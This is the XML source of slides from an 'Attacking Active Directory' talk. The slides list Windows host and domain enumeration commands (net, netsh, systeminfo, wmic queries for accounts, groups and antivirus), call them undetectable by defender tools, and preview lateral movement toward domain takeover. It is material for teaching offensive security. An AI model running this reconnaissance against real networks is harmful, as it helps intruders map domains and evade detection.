          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>localgroup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> Administrators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>netsh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>advfirewall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>allprofiles</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> state</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>systeminfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>env:ComSpec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>env:USERNAME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>env:USERDOMAIN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>env:LOGONSERVER</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Tree $home</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>*net </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>cmds</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5891902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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E0A343AC-0FC2-4DD6-9CFC-5FE2E9F5B0B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1879134" y="2767280"/>
            <a:ext cx="9127222" cy="1323439"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="8000" dirty="0"/>
              <a:t>Lets Get Started!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188223354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89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82EC8EFF-20F8-4961-933A-01A1CB6F7BFA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393638" y="94736"/>
            <a:ext cx="9404723" cy="713064"/>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Enumeration  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ATP/A Undetectable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D0006C1-4BFB-4AE5-AFD3-ADFBDDB652BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="449716" y="1912564"/>
            <a:ext cx="11940780" cy="4278094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Undetected (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>so far</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>):  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic process list brief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic group list brief</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>computersystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic process list /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>format:list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>ntdomain</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> list /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>format:list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>useraccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> list /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>format:list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic group list /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>format:list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>sysaccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> list /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>format:list</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>wmic /Namespace:\\root\SecurityCenter2 Path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>AntiVirusProduct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> Get *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buClr>
                <a:srgbClr val="C2FC32"/>
              </a:buClr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>WMIObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> -Class Win32_UserAccount -Filter "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>LocalAccount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>='True'"</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="136223667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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Pt3 Review</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89204A4E-CC02-47D1-A761-E1D23AF0F3E3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10617694" y="6489813"/>
            <a:ext cx="1491448" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>@h3xg4m3s</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1201475" y="1966419"/>
            <a:ext cx="6589975" cy="1938992"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Network </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" err="1"/>
              <a:t>Enum</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Identify paths to DA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2733620078"/>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89E268-3DD2-42FE-8BF9-9767D6F8FD8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1393637" y="164172"/>
            <a:ext cx="9404723" cy="713064"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Attacking Active Directory</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E538C57-FC28-46D2-A697-B1C3FF674842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1583101" y="816189"/>
            <a:ext cx="9404723" cy="713064"/>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Next Time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBE485F7-C97F-40A5-9391-927529D5909C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="189914" y="2052144"/>
            <a:ext cx="11507373" cy="3785652"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Lateral Movement</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="4800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C2FC32"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Sliding into your DCs </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0"/>
              <a:t>             and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="685800" indent="-685800">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C2FC32"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWNING THE DOMAIN</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30F9607E-8EEF-4AE6-AB62-C96F28D01CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7687995" y="1408070"/>
            <a:ext cx="4081975" cy="5449930"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Multiplication Sign 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A290442D-5A8B-474B-B80D-CE2C5AAA7C1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="361294">
            <a:off x="10404002" y="1333526"/>
            <a:ext cx="1026968" cy="906404"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4120"/>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27902F2B-0DA6-4FEE-AE57-A09E3A5D5C04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
